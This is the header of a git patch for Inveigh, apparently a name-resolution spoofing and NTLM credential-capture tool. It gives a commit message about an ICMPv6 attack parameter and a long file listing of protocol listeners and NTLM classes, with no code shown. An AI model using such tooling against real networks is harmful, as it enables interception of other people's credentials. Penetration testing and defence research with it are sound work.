From 1673eba26f1fd6223155b78c8113a17ca092617b Mon Sep 17 00:00:00 2001 From: Kevin Robertson Date: Mon, 3 Jan 2022 20:13:22 -0500 Subject: ICMPv6TTL, output levels, bug fixes Added ICMPv6TTL parameter for ICMPv6 attacks. more Console parameter output levels, and bug fixes. --- Inveigh/Listeners/HTTPListener.cs | 445 ++--------------- Inveigh/Listeners/LDAPListener.cs | 159 +----- Inveigh/Listeners/LLMNRListener.cs | 3 - Inveigh/Listeners/MDNSListener.cs | 9 +- Inveigh/Listeners/NBNSListener.cs | 3 - Inveigh/Listeners/SMBListener.cs | 232 +-------- Inveigh/Program.cs | 24 +- Inveigh/Protocols/LICENSE | 29 -- Inveigh/Protocols/Quiddity/LICENSE | 29 ++ .../Protocols/Quiddity/Listeners/DHCPv6Listener.cs | 177 ------- .../Protocols/Quiddity/Listeners/DNSListener.cs | 151 ------ .../Protocols/Quiddity/Listeners/LLMNRListener.cs | 101 ---- .../Protocols/Quiddity/Listeners/MDNSListener.cs | 117 ----- .../Quiddity/Listeners/NetBIOSNSListener.cs | 95 ---- .../Protocols/Quiddity/Listeners/TCPListener.cs | 48 -- .../Protocols/Quiddity/Listeners/UDPListener.cs | 58 --- .../Protocols/DCERPC/SCMR/SCMRROpenSCManagerW.cs | 15 - .../Quiddity/Protocols/DHCPv6/DHCPv6Checker.cs | 150 ------ .../Quiddity/Protocols/DHCPv6/DHCPv6Message.cs | 86 ---- .../Quiddity/Protocols/DHCPv6/DHCPv6Packet.cs | 222 --------- .../Protocols/DHCPv6/Options/DHCPv6Option.cs | 39 -- .../Protocols/DHCPv6/Options/DHCPv6Option1.cs | 88 ---- .../Protocols/DHCPv6/Options/DHCPv6Option14.cs | 86 ---- .../Protocols/DHCPv6/Options/DHCPv6Option16.cs | 90 ---- .../Protocols/DHCPv6/Options/DHCPv6Option2.cs | 95 ---- .../Protocols/DHCPv6/Options/DHCPv6Option23.cs | 97 ---- .../Protocols/DHCPv6/Options/DHCPv6Option24.cs | 95 ---- .../Protocols/DHCPv6/Options/DHCPv6Option3.cs | 107 ---- .../Protocols/DHCPv6/Options/DHCPv6Option39.cs | 128 ----- .../Protocols/DHCPv6/Options/DHCPv6Option5.cs | 77 --- .../Protocols/DHCPv6/Options/DHCPv6Option6.cs | 87 ---- .../Protocols/DHCPv6/Options/DHCPv6Option8.cs | 88 ---- .../DHCPv6/Options/Values/DHCPv6DUIDLL.cs | 72 --- .../DHCPv6/Options/Values/DHCPv6DUIDLLT.cs | 57 --- .../Protocols/Quiddity/Protocols/DNS/DNSChecker.cs | 329 ------------- .../Protocols/Quiddity/Protocols/DNS/DNSHeader.cs | 169 ------- .../Protocols/Quiddity/Protocols/DNS/DNSPacket.cs | 185 ------- .../Quiddity/Protocols/DNS/DNSQuestion.cs | 193 -------- .../Quiddity/Protocols/DNS/DNSResource.cs | 122 ----- .../Quiddity/Protocols/DNS/RDATA/DNSRecordA.cs | 33 -- .../Quiddity/Protocols/DNS/RDATA/DNSRecordAAAA.cs | 34 -- .../Quiddity/Protocols/DNS/RDATA/DNSRecordSOA.cs | 85 ---- .../Quiddity/Protocols/DNS/RDATA/DNSRecordSRV.cs | 42 -- .../Protocols/GSSAPI/GSSAPIInitSecContext.cs | 49 -- .../Quiddity/Protocols/HTTP/HTTPRequest.cs | 159 ------ .../Quiddity/Protocols/HTTP/HTTPResponse.cs | 166 ------- .../Protocols/ICMPv6/ICMPv6RouterAdvertisement.cs | 107 ---- .../ICMPv6/Options/ICMPv6DNSSearchList.cs | 43 -- .../Protocols/ICMPv6/Options/ICMPv6RecursiveDNS.cs | 73 --- .../Protocols/Quiddity/Protocols/IP/IPHeader.cs | 81 ---- .../Quiddity/Protocols/LDAP/LDAPMessage.cs | 182 ------- .../Protocols/LDAP/ProtocolOp/LDAPBindRequest.cs | 23 - .../Protocols/LDAP/ProtocolOp/LDAPBindResponse.cs | 18 - .../LDAP/ProtocolOp/LDAPPartialAttributeList.cs | 13 - .../Protocols/LDAP/ProtocolOp/LDAPSearchRequest.cs | 46 -- .../Protocols/LDAP/ProtocolOp/LDAPSearchResDone.cs | 22 - .../LDAP/ProtocolOp/LDAPSearchResEntry.cs | 25 - .../Quiddity/Protocols/LDAP/Values/LDAPResult.cs | 46 -- .../Protocols/LDAP/Values/LDAPSaslCredentials.cs | 52 -- .../LDAP/Values/LDAPSupportedCapabilities.cs | 55 --- .../LDAP/Values/LDAPSupportedSASLMechanisms.cs | 56 --- .../Quiddity/Protocols/LLMNR/LLMNRChecker.cs | 41 -- .../Quiddity/Protocols/LLMNR/LLMNRHeader.cs | 130 ----- .../Quiddity/Protocols/LLMNR/LLMNRPacket.cs | 98 ---- .../Quiddity/Protocols/LLMNR/LLMNRQuestion.cs | 53 -- .../Quiddity/Protocols/LLMNR/LLMNRResource.cs | 74 --- .../Quiddity/Protocols/MDNS/MDNSChecker.cs | 84 ---- .../Quiddity/Protocols/MDNS/MDNSHeader.cs | 124 ----- .../Quiddity/Protocols/MDNS/MDNSPacket.cs | 99 ---- .../Quiddity/Protocols/MDNS/MDNSQuestion.cs | 63 --- .../Quiddity/Protocols/MDNS/MDNSResource.cs | 39 -- .../Quiddity/Protocols/NTLM/NTLMChallenge.cs | 275 ----------- .../Quiddity/Protocols/NTLM/NTLMHelper.cs | 94 ---- .../Quiddity/Protocols/NTLM/NTLMNegotiate.cs | 120 ----- .../Quiddity/Protocols/NTLM/NTLMResponse.cs | 221 --------- .../Protocols/NTLM/Structures/NTLMAVPair.cs | 128 ----- .../Protocols/NTLM/Structures/NTLMv1Response.cs | 39 -- .../NTLM/Structures/NTLMv2ClientChallenge.cs | 39 -- .../Protocols/NTLM/Structures/NTLMv2Response.cs | 39 -- .../Quiddity/Protocols/NetBIOS/NetBIOSNSChecker.cs | 76 --- .../Quiddity/Protocols/NetBIOS/NetBIOSNSHeader.cs | 135 ------ .../Quiddity/Protocols/NetBIOS/NetBIOSNSPacket.cs | 93 ---- .../Protocols/NetBIOS/NetBIOSNSQuestion.cs | 162 ------- .../Protocols/NetBIOS/NetBIOSNSResource.cs | 68 --- .../Protocols/NetBIOS/NetBIOSSessionService.cs | 82 ---- .../Protocols/Quiddity/Protocols/PacketReader.cs | 74 --- .../Protocols/Quiddity/Protocols/PacketWriter.cs | 76 --- .../SMB/Commands/SMBCOMSessionSetupAndXRequest.cs | 92 ---- .../SMB/Commands/SMBCOMSessionSetupAndXResponse.cs | 91 ---- .../Protocols/Quiddity/Protocols/SMB/SMBHeader.cs | 93 ---- .../Protocols/Quiddity/Protocols/SMB/SMBHelper.cs | 70 --- .../Protocols/SMB2/Commands/SMB2CloseRequest.cs | 47 -- .../Protocols/SMB2/Commands/SMB2CloseResponse.cs | 54 --- .../Protocols/SMB2/Commands/SMB2CreateRequest.cs | 120 ----- .../Protocols/SMB2/Commands/SMB2CreateResponse.cs | 45 -- .../Protocols/SMB2/Commands/SMB2ErrorResponse.cs | 48 -- .../Protocols/SMB2/Commands/SMB2FlushRequest.cs | 47 -- .../Protocols/SMB2/Commands/SMB2FlushResponse.cs | 45 -- .../Protocols/SMB2/Commands/SMB2LogoffRequest.cs | 45 -- .../Protocols/SMB2/Commands/SMB2LogoffResponse.cs | 45 -- .../SMB2/Commands/SMB2NegotiateResponse.cs | 164 ------- .../SMB2/Commands/SMB2NegotiatelRequest.cs | 118 ----- .../SMB2/Commands/SMB2QueryDirectoryRequest.cs | 70 --- .../SMB2/Commands/SMB2QueryDirectoryResponse.cs | 47 -- .../Protocols/SMB2/Commands/SMB2ReadRequest.cs | 54 --- .../Protocols/SMB2/Commands/SMB2ReadResponse.cs | 42 -- .../SMB2/Commands/SMB2SessionSetupRequest.cs | 89 ---- .../SMB2/Commands/SMB2SessionSetupResponse.cs | 114 ----- .../SMB2/Commands/SMB2TreeConnectRequest.cs | 50 -- .../SMB2/Commands/SMB2TreeConnectResponse.cs | 88 ---- .../SMB2/Commands/SMB2TreeDisconnectRequest.cs | 45 -- .../SMB2/Commands/SMB2TreeDisconnectResponse.cs | 45 -- .../Protocols/SMB2/Commands/SMB2WriteRequest.cs | 68 --- .../Protocols/SMB2/Commands/SMB2WriteResponse.cs | 49 -- .../Quiddity/Protocols/SMB2/SMB2Header.cs | 133 ----- .../Quiddity/Protocols/SMB2/SMB2Helper.cs | 124 ----- .../Quiddity/Protocols/SMB2/SMB2Packet.cs | 42 -- .../SMB2/Structures/SMB2NegotiateContext.cs | 108 ----- .../Protocols/SPNEGO/SPNEGONegTokenInit.cs | 64 --- .../Protocols/SPNEGO/SPNEGONegTokenResp.cs | 55 --- .../Protocols/Quiddity/Protocols/TCP/TCPHeader.cs | 124 ----- .../Protocols/Quiddity/Protocols/UDP/UDPHeader.cs | 130 ----- Inveigh/Protocols/Quiddity/Quiddity.sln | 25 + .../Quiddity/Quiddity/Clients/SMBClient.cs | 64 +++ .../Quiddity/Quiddity/Clients/TCPClient.cs | 47 ++ .../Quiddity/Quiddity/Listeners/DHCPv6Listener.cs | 184 +++++++ .../Quiddity/Quiddity/Listeners/DNSListener.cs | 168 +++++++ .../Quiddity/Quiddity/Listeners/HTTPListener.cs | 540 +++++++++++++++++++++ .../Quiddity/Quiddity/Listeners/LDAPListener.cs | 243 ++++++++++ .../Quiddity/Quiddity/Listeners/LLMNRListener.cs | 101 ++++ .../Quiddity/Quiddity/Listeners/MDNSListener.cs | 117 +++++ .../Quiddity/Listeners/NetBIOSNSListener.cs | 95 ++++ .../Quiddity/Quiddity/Listeners/SMBListener.cs | 306 ++++++++++++ .../Quiddity/Quiddity/Listeners/TCPListener.cs | 48 ++ .../Quiddity/Quiddity/Listeners/UDPListener.cs | 58 +++ .../Protocols/DCERPC/SCMR/SCMRROpenSCManagerW.cs | 15 + .../Quiddity/Protocols/DHCPv6/DHCPv6Checker.cs | 150 ++++++ .../Quiddity/Protocols/DHCPv6/DHCPv6Message.cs | 86 ++++ .../Quiddity/Protocols/DHCPv6/DHCPv6Packet.cs | 222 +++++++++ .../Protocols/DHCPv6/Options/DHCPv6Option.cs | 39 ++ .../Protocols/DHCPv6/Options/DHCPv6Option1.cs | 88 ++++ .../Protocols/DHCPv6/Options/DHCPv6Option14.cs | 86 ++++ .../Protocols/DHCPv6/Options/DHCPv6Option16.cs | 90 ++++ .../Protocols/DHCPv6/Options/DHCPv6Option2.cs | 95 ++++ .../Protocols/DHCPv6/Options/DHCPv6Option23.cs | 97 ++++ .../Protocols/DHCPv6/Options/DHCPv6Option24.cs | 95 ++++ .../Protocols/DHCPv6/Options/DHCPv6Option3.cs | 107 ++++ .../Protocols/DHCPv6/Options/DHCPv6Option39.cs | 128 +++++ .../Protocols/DHCPv6/Options/DHCPv6Option5.cs | 77 +++ .../Protocols/DHCPv6/Options/DHCPv6Option6.cs | 87 ++++ .../Protocols/DHCPv6/Options/DHCPv6Option8.cs | 88 ++++ .../DHCPv6/Options/Values/DHCPv6DUIDLL.cs | 72 +++ .../DHCPv6/Options/Values/DHCPv6DUIDLLT.cs | 57 +++ .../Quiddity/Quiddity/Protocols/DNS/DNSChecker.cs | 320 ++++++++++++ .../Quiddity/Quiddity/Protocols/DNS/DNSHeader.cs | 181 +++++++ .../Quiddity/Quiddity/Protocols/DNS/DNSPacket.cs | 185 +++++++ .../Quiddity/Quiddity/Protocols/DNS/DNSQuestion.cs | 193 ++++++++ .../Quiddity/Quiddity/Protocols/DNS/DNSResource.cs | 122 +++++ .../Quiddity/Protocols/DNS/RDATA/DNSRecordA.cs | 33 ++ .../Quiddity/Protocols/DNS/RDATA/DNSRecordAAAA.cs | 34 ++ .../Quiddity/Protocols/DNS/RDATA/DNSRecordSOA.cs | 86 ++++ .../Quiddity/Protocols/DNS/RDATA/DNSRecordSRV.cs | 42 ++ .../Protocols/GSSAPI/GSSAPIInitSecContext.cs | 49 ++ .../Quiddity/Protocols/HTTP/HTTPRequest.cs | 159 ++++++ .../Quiddity/Protocols/HTTP/HTTPResponse.cs | 166 +++++++ .../Protocols/ICMPv6/ICMPv6RouterAdvertisement.cs | 107 ++++ .../ICMPv6/Options/ICMPv6DNSSearchList.cs | 43 ++ .../Protocols/ICMPv6/Options/ICMPv6RecursiveDNS.cs | 73 +++ .../Quiddity/Quiddity/Protocols/IP/IPHeader.cs | 81 ++++ .../Quiddity/Protocols/LDAP/LDAPMessage.cs | 182 +++++++ .../Protocols/LDAP/ProtocolOp/LDAPBindRequest.cs | 23 + .../Protocols/LDAP/ProtocolOp/LDAPBindResponse.cs | 18 + .../LDAP/ProtocolOp/LDAPPartialAttributeList.cs | 13 + .../Protocols/LDAP/ProtocolOp/LDAPSearchRequest.cs | 46 ++ .../Protocols/LDAP/ProtocolOp/LDAPSearchResDone.cs | 22 + .../LDAP/ProtocolOp/LDAPSearchResEntry.cs | 25 + .../Quiddity/Protocols/LDAP/Values/LDAPResult.cs | 46 ++ .../Protocols/LDAP/Values/LDAPSaslCredentials.cs | 52 ++ .../LDAP/Values/LDAPSupportedCapabilities.cs | 55 +++ .../LDAP/Values/LDAPSupportedSASLMechanisms.cs | 56 +++ .../Quiddity/Protocols/LLMNR/LLMNRChecker.cs | 41 ++ .../Quiddity/Protocols/LLMNR/LLMNRHeader.cs | 130 +++++ .../Quiddity/Protocols/LLMNR/LLMNRPacket.cs | 98 ++++ .../Quiddity/Protocols/LLMNR/LLMNRQuestion.cs | 53 ++ .../Quiddity/Protocols/LLMNR/LLMNRResource.cs | 74 +++ .../Quiddity/Protocols/MDNS/MDNSChecker.cs | 84 ++++ .../Quiddity/Quiddity/Protocols/MDNS/MDNSHeader.cs | 124 +++++ .../Quiddity/Quiddity/Protocols/MDNS/MDNSPacket.cs | 99 ++++ .../Quiddity/Protocols/MDNS/MDNSQuestion.cs | 63 +++ .../Quiddity/Protocols/MDNS/MDNSResource.cs | 39 ++ .../Quiddity/Protocols/NTLM/NTLMChallenge.cs | 275 +++++++++++ .../Quiddity/Quiddity/Protocols/NTLM/NTLMHelper.cs | 94 ++++ .../Quiddity/Protocols/NTLM/NTLMNegotiate.cs | 120 +++++ .../Quiddity/Protocols/NTLM/NTLMResponse.cs | 221 +++++++++ .../Protocols/NTLM/Structures/NTLMAVPair.cs | 128 +++++ .../Protocols/NTLM/Structures/NTLMv1Response.cs | 39 ++ .../NTLM/Structures/NTLMv2ClientChallenge.cs | 39 ++ .../Protocols/NTLM/Structures/NTLMv2Response.cs | 39 ++ .../Quiddity/Protocols/NetBIOS/NetBIOSNSChecker.cs | 76 +++ .../Quiddity/Protocols/NetBIOS/NetBIOSNSHeader.cs | 135 ++++++ .../Quiddity/Protocols/NetBIOS/NetBIOSNSPacket.cs | 93 ++++ .../Protocols/NetBIOS/NetBIOSNSQuestion.cs | 166 +++++++ .../Protocols/NetBIOS/NetBIOSNSResource.cs | 68 +++ .../Protocols/NetBIOS/NetBIOSSessionService.cs | 82 ++++ .../Quiddity/Quiddity/Protocols/PacketReader.cs | 74 +++ .../Quiddity/Quiddity/Protocols/PacketWriter.cs | 76 +++ .../SMB/Commands/SMBCOMSessionSetupAndXRequest.cs | 92 ++++ .../SMB/Commands/SMBCOMSessionSetupAndXResponse.cs | 91 ++++ .../Quiddity/Quiddity/Protocols/SMB/SMBHeader.cs | 93 ++++ .../Quiddity/Quiddity/Protocols/SMB/SMBHelper.cs | 70 +++ .../Protocols/SMB2/Commands/SMB2CloseRequest.cs | 47 ++ .../Protocols/SMB2/Commands/SMB2CloseResponse.cs | 54 +++ .../Protocols/SMB2/Commands/SMB2CreateRequest.cs | 120 +++++ .../Protocols/SMB2/Commands/SMB2CreateResponse.cs | 45 ++ .../Protocols/SMB2/Commands/SMB2ErrorResponse.cs | 48 ++ .../Protocols/SMB2/Commands/SMB2FlushRequest.cs | 47 ++ .../Protocols/SMB2/Commands/SMB2FlushResponse.cs | 45 ++ .../Protocols/SMB2/Commands/SMB2LogoffRequest.cs | 45 ++ .../Protocols/SMB2/Commands/SMB2LogoffResponse.cs | 45 ++ .../SMB2/Commands/SMB2NegotiateResponse.cs | 164 +++++++ .../SMB2/Commands/SMB2NegotiatelRequest.cs | 118 +++++ .../SMB2/Commands/SMB2QueryDirectoryRequest.cs | 70 +++ .../SMB2/Commands/SMB2QueryDirectoryResponse.cs | 47 ++ .../Protocols/SMB2/Commands/SMB2ReadRequest.cs | 54 +++ .../Protocols/SMB2/Commands/SMB2ReadResponse.cs | 42 ++ .../SMB2/Commands/SMB2SessionSetupRequest.cs | 89 ++++ .../SMB2/Commands/SMB2SessionSetupResponse.cs | 114 +++++ .../SMB2/Commands/SMB2TreeConnectRequest.cs | 50 ++ .../SMB2/Commands/SMB2TreeConnectResponse.cs | 88 ++++ .../SMB2/Commands/SMB2TreeDisconnectRequest.cs | 45 ++ .../SMB2/Commands/SMB2TreeDisconnectResponse.cs | 45 ++ .../Protocols/SMB2/Commands/SMB2WriteRequest.cs | 68 +++ .../Protocols/SMB2/Commands/SMB2WriteResponse.cs | 49 ++ .../Quiddity/Quiddity/Protocols/SMB2/SMB2Header.cs | 133 +++++ .../Quiddity/Quiddity/Protocols/SMB2/SMB2Helper.cs | 124 +++++ .../Quiddity/Quiddity/Protocols/SMB2/SMB2Packet.cs | 42 ++ .../SMB2/Structures/SMB2NegotiateContext.cs | 108 +++++ .../Protocols/SPNEGO/SPNEGONegTokenInit.cs | 64 +++ .../Protocols/SPNEGO/SPNEGONegTokenResp.cs | 55 +++ .../Quiddity/Quiddity/Protocols/TCP/TCPHeader.cs | 124 +++++ .../Quiddity/Quiddity/Protocols/UDP/UDPHeader.cs | 130 +++++ .../Protocols/Quiddity/Quiddity/Quiddity.csproj | 55 +++ .../Protocols/Quiddity/Quiddity/Support/ASN1.cs | 284 +++++++++++ .../Quiddity/Quiddity/Support/Utilities.cs | 126 +++++ Inveigh/Protocols/Quiddity/README.md | 17 + Inveigh/Protocols/Quiddity/Support/ASN1.cs | 284 ----------- Inveigh/Protocols/Quiddity/Support/Utilities.cs | 126 ----- Inveigh/Protocols/README.md | 17 - Inveigh/Sniffer/Sniffer.cs | 40 +- Inveigh/Sockets/ICMPv6Socket.cs | 42 +- Inveigh/Sockets/UDPSocket.cs | 39 +- Inveigh/Support/Arguments.cs | 127 ++++- Inveigh/Support/Control.cs | 152 +++++- Inveigh/Support/Output.cs | 85 +++- Inveigh/Support/Shell.cs | 147 ++++-- README.md | 19 +- 256 files changed, 12357 insertions(+), 11443 deletions(-) delete mode 100644 Inveigh/Protocols/LICENSE create mode 100644 Inveigh/Protocols/Quiddity/LICENSE delete mode 100644 Inveigh/Protocols/Quiddity/Listeners/DHCPv6Listener.cs delete mode 100644 Inveigh/Protocols/Quiddity/Listeners/DNSListener.cs delete mode 100644 Inveigh/Protocols/Quiddity/Listeners/LLMNRListener.cs delete mode 100644 Inveigh/Protocols/Quiddity/Listeners/MDNSListener.cs delete mode 100644 Inveigh/Protocols/Quiddity/Listeners/NetBIOSNSListener.cs delete mode 100644 Inveigh/Protocols/Quiddity/Listeners/TCPListener.cs delete mode 100644 Inveigh/Protocols/Quiddity/Listeners/UDPListener.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DCERPC/SCMR/SCMRROpenSCManagerW.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DHCPv6/DHCPv6Checker.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DHCPv6/DHCPv6Message.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DHCPv6/DHCPv6Packet.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option1.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option14.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option16.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option2.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option23.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option24.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option3.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option39.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option5.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option6.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option8.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/Values/DHCPv6DUIDLL.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/Values/DHCPv6DUIDLLT.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DNS/DNSChecker.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DNS/DNSHeader.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DNS/DNSPacket.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DNS/DNSQuestion.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DNS/DNSResource.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DNS/RDATA/DNSRecordA.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DNS/RDATA/DNSRecordAAAA.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DNS/RDATA/DNSRecordSOA.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/DNS/RDATA/DNSRecordSRV.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/GSSAPI/GSSAPIInitSecContext.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/HTTP/HTTPRequest.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/HTTP/HTTPResponse.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/ICMPv6/ICMPv6RouterAdvertisement.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/ICMPv6/Options/ICMPv6DNSSearchList.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/ICMPv6/Options/ICMPv6RecursiveDNS.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/IP/IPHeader.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/LDAP/LDAPMessage.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/LDAP/ProtocolOp/LDAPBindRequest.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/LDAP/ProtocolOp/LDAPBindResponse.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/LDAP/ProtocolOp/LDAPPartialAttributeList.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/LDAP/ProtocolOp/LDAPSearchRequest.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/LDAP/ProtocolOp/LDAPSearchResDone.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/LDAP/ProtocolOp/LDAPSearchResEntry.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/LDAP/Values/LDAPResult.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/LDAP/Values/LDAPSaslCredentials.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/LDAP/Values/LDAPSupportedCapabilities.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/LDAP/Values/LDAPSupportedSASLMechanisms.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/LLMNR/LLMNRChecker.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/LLMNR/LLMNRHeader.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/LLMNR/LLMNRPacket.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/LLMNR/LLMNRQuestion.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/LLMNR/LLMNRResource.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/MDNS/MDNSChecker.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/MDNS/MDNSHeader.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/MDNS/MDNSPacket.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/MDNS/MDNSQuestion.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/MDNS/MDNSResource.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/NTLM/NTLMChallenge.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/NTLM/NTLMHelper.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/NTLM/NTLMNegotiate.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/NTLM/NTLMResponse.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/NTLM/Structures/NTLMAVPair.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/NTLM/Structures/NTLMv1Response.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/NTLM/Structures/NTLMv2ClientChallenge.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/NTLM/Structures/NTLMv2Response.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/NetBIOS/NetBIOSNSChecker.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/NetBIOS/NetBIOSNSHeader.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/NetBIOS/NetBIOSNSPacket.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/NetBIOS/NetBIOSNSQuestion.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/NetBIOS/NetBIOSNSResource.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/NetBIOS/NetBIOSSessionService.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/PacketReader.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/PacketWriter.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB/Commands/SMBCOMSessionSetupAndXRequest.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB/Commands/SMBCOMSessionSetupAndXResponse.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB/SMBHeader.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB/SMBHelper.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2CloseRequest.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2CloseResponse.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2CreateRequest.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2CreateResponse.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2ErrorResponse.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2FlushRequest.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2FlushResponse.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2LogoffRequest.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2LogoffResponse.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2NegotiateResponse.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2NegotiatelRequest.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2QueryDirectoryRequest.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2QueryDirectoryResponse.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2ReadRequest.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2ReadResponse.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2SessionSetupRequest.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2SessionSetupResponse.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2TreeConnectRequest.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2TreeConnectResponse.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2TreeDisconnectRequest.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2TreeDisconnectResponse.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2WriteRequest.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2WriteResponse.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/SMB2Header.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/SMB2Helper.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/SMB2Packet.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SMB2/Structures/SMB2NegotiateContext.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SPNEGO/SPNEGONegTokenInit.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/SPNEGO/SPNEGONegTokenResp.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/TCP/TCPHeader.cs delete mode 100644 Inveigh/Protocols/Quiddity/Protocols/UDP/UDPHeader.cs create mode 100644 